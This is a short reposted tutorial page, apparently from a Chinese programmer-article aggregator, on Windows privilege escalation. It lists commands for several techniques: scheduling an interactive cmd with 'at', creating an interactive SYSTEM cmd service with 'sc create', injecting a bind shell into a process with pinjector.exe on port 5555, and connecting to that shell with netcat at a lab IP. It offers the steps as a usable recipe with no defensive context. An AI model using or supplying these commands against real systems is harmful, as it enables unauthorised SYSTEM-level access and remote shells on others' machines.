windows提权
程序员文章站
2022-07-15 13:09:33
...
- PsExec
- at
- Process_Injector
-
sc
psexec
当前用户是jh
提权之后
*at命令提权(适用于xp,2003)
at 15:05 /interact cmd
sc
创建服务(打开cmd命令窗口的服务)
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
启动服务刚才创建的服务
sc start systemcmd
process_injector
列出当前的所有进程
pinjector.exe -l
选择要提权成的用户,进行进程注入
pinjector.exe -p 732 cmd 5555 #服务端实现进程注入
nc -nv 10.10.10.19 5555 # 客户端连接服务端
转载于:https://blog.51cto.com/13155409/2154920
上一篇: org.apache.commons.logging.LogFactory
下一篇: DTD编写报错Open quote is expected for attribute xxx associated with an element type xxx原因分析
推荐阅读
-
Linux和windows中的换行符差异问题
-
Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)
-
Windows7旗舰版32位Oracle10g的安装和卸载教程
-
windows系统中OneDrive无法打开登陆不了的解决办法
-
jdk6安装说明 在windows xp中安装JAVA环境办法分享
-
Windows Live Mail定期删除收件箱方法
-
Windows VHD/VHDX 辅助处理工具 2013 图文安装教程(教你安装Win7/Win8/win10双系统)
-
如何找回windows10中消失的Modern版IE浏览器的方法
-
windows10下使用IE浏览器出现报错的解决办法
-
Windows7/XP/Vista局域网共享驱动器